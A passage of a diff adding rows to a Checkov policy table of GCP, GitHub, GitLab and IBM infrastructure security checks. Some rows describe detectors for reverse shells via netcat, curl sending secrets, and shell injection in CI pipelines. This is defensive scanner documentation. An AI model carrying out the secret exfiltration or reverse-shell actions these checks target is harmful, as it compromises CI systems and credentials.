+| 2385 | CKV2_GCP_4 | resource | google_logging_folder_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) |
+| 2386 | CKV2_GCP_4 | resource | google_logging_organization_sink | Ensure that retention 
policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) |
+| 2387 | CKV2_GCP_4 | resource | google_logging_project_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) |
+| 2388 | CKV2_GCP_4 | resource | google_storage_bucket | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) |
+| 2389 | CKV2_GCP_5 | resource | google_project | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) |
+| 2390 | CKV2_GCP_5 | resource | google_project_iam_audit_config | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) |
+| 2391 | CKV2_GCP_6 | resource | google_kms_crypto_key | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) |
+| 2392 | 
CKV2_GCP_6 | resource | google_kms_crypto_key_iam_binding | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) |
+| 2393 | CKV2_GCP_6 | resource | google_kms_crypto_key_iam_member | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) |
+| 2394 | CKV2_GCP_7 | resource | google_sql_database_instance | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) |
+| 2395 | CKV2_GCP_7 | resource | google_sql_user | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) |
+| 2396 | CKV2_GCP_8 | resource | google_kms_key_ring | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) |
+| 2397 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_binding | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | 
[GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) |
+| 2398 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_member | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) |
+| 2399 | CKV2_GCP_9 | resource | google_container_registry | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) |
+| 2400 | CKV2_GCP_9 | resource | google_storage_bucket_iam_binding | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) |
+| 2401 | CKV2_GCP_9 | resource | google_storage_bucket_iam_member | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) |
+| 2402 | CKV2_GCP_10 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function HTTP trigger is secured | Terraform | [CloudFunctionSecureHTTPTrigger.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/CloudFunctionSecureHTTPTrigger.yaml) |
+| 2403 | CKV2_GCP_11 | resource | 
google_project_services | Ensure GCP GCR Container Vulnerability Scanning is enabled | Terraform | [GCRContainerVulnerabilityScanningEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCRContainerVulnerabilityScanningEnabled.yaml) |
+| 2404 | CKV2_GCP_12 | resource | google_compute_firewall | Ensure GCP compute firewall ingress does not allow unrestricted access to all ports | Terraform | [GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml) |
+| 2405 | CKV2_GCP_13 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_duration' is set to 'on' | Terraform | [GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml) |
+| 2406 | CKV2_GCP_14 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_executor_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml) |
+| 2407 | CKV2_GCP_15 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_parser_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml) |
+| 2408 | CKV2_GCP_16 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_planner_stats' is set to 'off' | Terraform | 
[GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml) |
+| 2409 | CKV2_GCP_17 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_statement_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml) |
+| 2410 | CKV2_GCP_18 | resource | google_compute_network | Ensure GCP network defines a firewall and does not use the default firewall | Terraform | [GCPNetworkDoesNotUseDefaultFirewall.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPNetworkDoesNotUseDefaultFirewall.yaml) |
+| 2411 | CKV2_GCP_19 | resource | google_container_cluster | Ensure GCP Kubernetes engine clusters have 'alpha cluster' feature disabled | Terraform | [GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml) |
+| 2412 | CKV2_GCP_20 | resource | google_sql_database_instance | Ensure MySQL DB instance has point-in-time recovery backup configured | Terraform | [GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml) |
+| 2413 | CKV2_GCP_21 | resource | google_notebooks_instance | Ensure Vertex AI instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexInstanceEncryptedWithCMK.yaml) |
+| 2414 | 
CKV2_GCP_22 | resource | google_document_ai_processor | Ensure Document AI Processors are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIProcessorEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIProcessorEncryptedWithCMK.yaml) |
+| 2415 | CKV2_GCP_23 | resource | google_document_ai_warehouse_location | Ensure Document AI Warehouse Location is configured to use a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml) |
+| 2416 | CKV2_GCP_24 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIEndpointEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIEndpointEncryptedWithCMK.yaml) |
+| 2417 | CKV2_GCP_25 | resource | google_vertex_ai_featurestore | Ensure Vertex AI featurestore uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIFeaturestoreEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIFeaturestoreEncryptedWithCMK.yaml) |
+| 2418 | CKV2_GCP_26 | resource | google_vertex_ai_tensorboard | Ensure Vertex AI tensorboard uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAITensorboardEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAITensorboardEncryptedWithCMK.yaml) |
+| 2419 | CKV2_GCP_27 | resource | google_workbench_instance | Ensure Vertex AI workbench instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | 
[GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml) |
+| 2420 | CKV2_GCP_28 | resource | google_workbench_instance | Ensure Vertex AI workbench instances are private | Terraform | [GCPVertexWorkbenchInstanceNoPublicIp.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceNoPublicIp.yaml) |
+| 2421 | CKV2_GCP_29 | resource | google_dialogflow_agent | Ensure logging is enabled for Dialogflow agents | Terraform | [GCPDialogFlowAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowAgentLoggingEnabled.yaml) |
+| 2422 | CKV2_GCP_30 | resource | google_dialogflow_cx_agent | Ensure logging is enabled for Dialogflow CX agents | Terraform | [GCPDialogFlowCxAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxAgentLoggingEnabled.yaml) |
+| 2423 | CKV2_GCP_31 | resource | google_dialogflow_cx_webhook | Ensure logging is enabled for Dialogflow CX webhooks | Terraform | [GCPDialogFlowCxWebhookLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxWebhookLoggingEnabled.yaml) |
+| 2424 | CKV2_GCP_32 | resource | google_tpu_v2_vm | Ensure TPU v2 is private | Terraform | [GCPTpuV2VmPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPTpuV2VmPrivateEndpoint.yaml) |
+| 2425 | CKV2_GCP_33 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint is private | Terraform | [GCPVertexAIPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateEndpoint.yaml) |
+| 2426 | CKV2_GCP_34 | resource | 
google_vertex_ai_index_endpoint | Ensure Vertex AI index endpoint is private | Terraform | [GCPVertexAIPrivateIndexEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateIndexEndpoint.yaml) |
+| 2427 | CKV2_GCP_35 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexRuntimeEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimeEncryptedWithCMK.yaml) |
+| 2428 | CKV2_GCP_36 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is private | Terraform | [GCPVertexRuntimePrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimePrivate.yaml) |
+| 2429 | CKV_GHA_1 | jobs | jobs | Ensure ACTIONS_ALLOW_UNSECURE_COMMANDS isn't true on environment variables | github_actions | [AllowUnsecureCommandsOnJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/AllowUnsecureCommandsOnJob.py) |
+| 2430 | CKV_GHA_1 | jobs | jobs.*.steps[] | Ensure ACTIONS_ALLOW_UNSECURE_COMMANDS isn't true on environment variables | github_actions | [AllowUnsecureCommandsOnJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/AllowUnsecureCommandsOnJob.py) |
+| 2431 | CKV_GHA_2 | jobs | jobs | Ensure run commands are not vulnerable to shell injection | github_actions | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ShellInjection.py) |
+| 2432 | CKV_GHA_2 | jobs | jobs.*.steps[] | Ensure run commands are not vulnerable to shell injection | github_actions | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ShellInjection.py) |
+| 2433 | CKV_GHA_3 | jobs | jobs | Suspicious use of curl with secrets | github_actions | 
[SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/SuspectCurlInScript.py) |
+| 2434 | CKV_GHA_3 | jobs | jobs.*.steps[] | Suspicious use of curl with secrets | github_actions | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/SuspectCurlInScript.py) |
+| 2435 | CKV_GHA_4 | jobs | jobs | Suspicious use of netcat with IP address | github_actions | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ReverseShellNetcat.py) |
+| 2436 | CKV_GHA_4 | jobs | jobs.*.steps[] | Suspicious use of netcat with IP address | github_actions | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ReverseShellNetcat.py) |
+| 2437 | CKV_GHA_5 | jobs | jobs | Found artifact build without evidence of cosign sign execution in pipeline | github_actions | [CosignArtifacts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/CosignArtifacts.py) |
+| 2438 | CKV_GHA_6 | jobs | jobs | Found artifact build without evidence of cosign sbom attestation in pipeline | github_actions | [CosignSBOM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/CosignSBOM.py) |
+| 2439 | CKV_GHA_7 | jobs | on | The build output cannot be affected by user parameters other than the build entry point and the top-level source location. GitHub Actions workflow_dispatch inputs MUST be empty. 
| github_actions | [EmptyWorkflowDispatch.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/EmptyWorkflowDispatch.py) | +| 2440 | CKV2_GHA_1 | resource | permissions | Ensure top-level permissions are not set to write-all | github_actions | [ReadOnlyTopLevelPermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/graph_checks/ReadOnlyTopLevelPermissions.yaml) | +| 2441 | CKV_GIT_1 | resource | github_repository | Ensure GitHub repository is Private | Terraform | [PrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/PrivateRepo.py) | +| 2442 | CKV_GIT_2 | resource | github_repository_webhook | Ensure GitHub repository webhooks are using HTTPS | Terraform | [WebhookInsecureSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/WebhookInsecureSsl.py) | +| 2443 | CKV_GIT_3 | resource | github_repository | Ensure GitHub repository has vulnerability alerts enabled | Terraform | [RepositoryEnableVulnerabilityAlerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/RepositoryEnableVulnerabilityAlerts.py) | +| 2444 | CKV_GIT_4 | resource | github_actions_environment_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) | +| 2445 | CKV_GIT_4 | resource | github_actions_organization_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) | +| 2446 | CKV_GIT_4 | resource | github_actions_secret | Ensure GitHub Actions secrets are encrypted | Terraform | 
[SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) | +| 2447 | CKV_GIT_5 | resource | github_branch_protection | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) | +| 2448 | CKV_GIT_5 | resource | github_branch_protection_v3 | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) | +| 2449 | CKV_GIT_6 | resource | github_branch_protection | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) | +| 2450 | CKV_GIT_6 | resource | github_branch_protection_v3 | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) | +| 2451 | CKV2_GIT_1 | resource | github_repository | Ensure each Repository has branch protection associated | Terraform | [RepositoryHasBranchProtection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/github/RepositoryHasBranchProtection.yaml) | +| 2452 | CKV_GITHUB_1 | github_configuration | * | Ensure GitHub organization security settings require 2FA | github_configuration | [2fa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/2fa.py) | +| 2453 | CKV_GITHUB_2 | github_configuration | * | Ensure GitHub organization security settings require SSO | github_configuration 
| [sso.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/sso.py) | +| 2454 | CKV_GITHUB_3 | github_configuration | * | Ensure GitHub organization security settings has IP allow list enabled | github_configuration | [ipallowlist.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/ipallowlist.py) | +| 2455 | CKV_GITHUB_4 | github_configuration | * | Ensure GitHub branch protection rules requires signed commits | github_configuration | [require_signatures.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_signatures.py) | +| 2456 | CKV_GITHUB_5 | github_configuration | * | Ensure GitHub branch protection rules does not allow force pushes | github_configuration | [disallow_force_pushes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_force_pushes.py) | +| 2457 | CKV_GITHUB_6 | github_configuration | * | Ensure GitHub organization webhooks are using HTTPS | github_configuration | [webhooks_https_orgs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/webhooks_https_orgs.py) | +| 2458 | CKV_GITHUB_7 | github_configuration | * | Ensure GitHub repository webhooks are using HTTPS | github_configuration | [webhooks_https_repos.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/webhooks_https_repos.py) | +| 2459 | CKV_GITHUB_8 | github_configuration | * | Ensure GitHub branch protection rules requires linear history | github_configuration | [require_linear_history.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_linear_history.py) | +| 2460 | CKV_GITHUB_9 | github_configuration | * | Ensure 2 admins are set for each repository | github_configuration | [repository_collaborators.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/repository_collaborators.py) | +| 2461 | CKV_GITHUB_10 | github_configuration | * | Ensure branch protection rules are 
enforced on administrators | github_configuration | [enforce_branch_protection_admins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/enforce_branch_protection_admins.py) | +| 2462 | CKV_GITHUB_11 | github_configuration | * | Ensure GitHub branch protection dismisses stale review on new commit | github_configuration | [dismiss_stale_reviews.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/dismiss_stale_reviews.py) | +| 2463 | CKV_GITHUB_12 | github_configuration | * | Ensure GitHub branch protection restricts who can dismiss PR reviews | github_configuration | [restrict_pr_review_dismissal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/restrict_pr_review_dismissal.py) | +| 2464 | CKV_GITHUB_13 | github_configuration | * | Ensure GitHub branch protection requires CODEOWNER reviews | github_configuration | [require_code_owner_reviews.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_code_owner_reviews.py) | +| 2465 | CKV_GITHUB_14 | github_configuration | * | Ensure all checks have passed before the merge of new code | github_configuration | [require_status_checks_pr.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_status_checks_pr.py) | +| 2466 | CKV_GITHUB_15 | github_configuration | * | Ensure inactive branches are reviewed and removed periodically | github_configuration | [disallow_inactive_branch_60days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_inactive_branch_60days.py) | +| 2467 | CKV_GITHUB_16 | github_configuration | * | Ensure GitHub branch protection requires conversation resolution | github_configuration | [require_conversation_resolution.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_conversation_resolution.py) | +| 2468 | CKV_GITHUB_17 | github_configuration | * | Ensure GitHub branch protection requires push restrictions | 
github_configuration | [require_push_restrictions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_push_restrictions.py) | +| 2469 | CKV_GITHUB_18 | github_configuration | * | Ensure GitHub branch protection rules does not allow deletions | github_configuration | [disallow_branch_deletions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_branch_deletions.py) | +| 2470 | CKV_GITHUB_19 | github_configuration | * | Ensure any change to code receives approval of two strongly authenticated users | github_configuration | [require_2approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_2approvals.py) | +| 2471 | CKV_GITHUB_20 | github_configuration | * | Ensure open git branches are up to date before they can be merged into codebase | github_configuration | [require_updated_branch_pr.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_updated_branch_pr.py) | +| 2472 | CKV_GITHUB_21 | github_configuration | * | Ensure public repository creation is limited to specific members | github_configuration | [public_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/public_repository_creation_is_limited.py) | +| 2473 | CKV_GITHUB_22 | github_configuration | * | Ensure private repository creation is limited to specific members | github_configuration | [private_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/private_repository_creation_is_limited.py) | +| 2474 | CKV_GITHUB_23 | github_configuration | * | Ensure internal repository creation is limited to specific members | github_configuration | [internal_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/internal_repository_creation_is_limited.py) | +| 2475 | CKV_GITHUB_26 | github_configuration | * | Ensure minimum admins are 
set for the organization | github_configuration | [minimum_admins_in_org.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/minimum_admins_in_org.py) | +| 2476 | CKV_GITHUB_27 | github_configuration | * | Ensure strict base permissions are set for repositories | github_configuration | [require_strict_base_permissions_repository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_strict_base_permissions_repository.py) | +| 2477 | CKV_GITHUB_28 | github_configuration | * | Ensure an organization's identity is confirmed with a Verified badge Passed | github_configuration | [require_verified_organization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_verified_organization.py) | +| 2478 | CKV_GITLAB_1 | gitlab_configuration | * | Merge requests should require at least 2 approvals | gitlab_configuration | [merge_requests_approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab/checks/merge_requests_approvals.py) | +| 2479 | CKV_GITLAB_2 | gitlab_configuration | * | Ensure all Gitlab groups require two factor authentication | gitlab_configuration | [two_factor_authentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab/checks/two_factor_authentication.py) | +| 2480 | CKV_GITLABCI_1 | jobs | *.script[] | Suspicious use of curl with CI environment variables in script | gitlab_ci | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py) | +| 2481 | CKV_GITLABCI_2 | jobs | *.rules | Avoid creating rules that generate double pipelines | gitlab_ci | [AvoidDoublePipelines.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/AvoidDoublePipelines.py) | +| 2482 | CKV_GITLABCI_3 | jobs | *.image[] | Detecting image usages in gitlab workflows | gitlab_ci | 
[DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/DetectImagesUsage.py) | +| 2483 | CKV_GITLABCI_3 | jobs | *.services[] | Detecting image usages in gitlab workflows | gitlab_ci | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/DetectImagesUsage.py) | +| 2484 | CKV_GLB_1 | resource | gitlab_project | Ensure at least two approving reviews are required to merge a GitLab MR | Terraform | [RequireTwoApprovalsToMerge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RequireTwoApprovalsToMerge.py) | +| 2485 | CKV_GLB_2 | resource | gitlab_branch_protection | Ensure GitLab branch protection rules does not allow force pushes | Terraform | [ForcePushDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/ForcePushDisabled.py) | +| 2486 | CKV_GLB_3 | resource | gitlab_project | Ensure GitLab prevent secrets is enabled | Terraform | [PreventSecretsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/PreventSecretsEnabled.py) | +| 2487 | CKV_GLB_4 | resource | gitlab_project | Ensure GitLab commits are signed | Terraform | [RejectUnsignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RejectUnsignedCommits.py) | +| 2488 | CKV2_IBM_1 | resource | ibm_is_lb | Ensure load balancer for VPC is private (disable public access) | Terraform | [IBM_LoadBalancerforVPCisPrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_LoadBalancerforVPCisPrivate.yaml) | +| 2489 | CKV2_IBM_2 | resource | ibm_is_vpc | Ensure VPC classic access is disabled | Terraform | [IBM_VPCclassicAccessIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_VPCclassicAccessIsDisabled.yaml) | +| 2490 | 
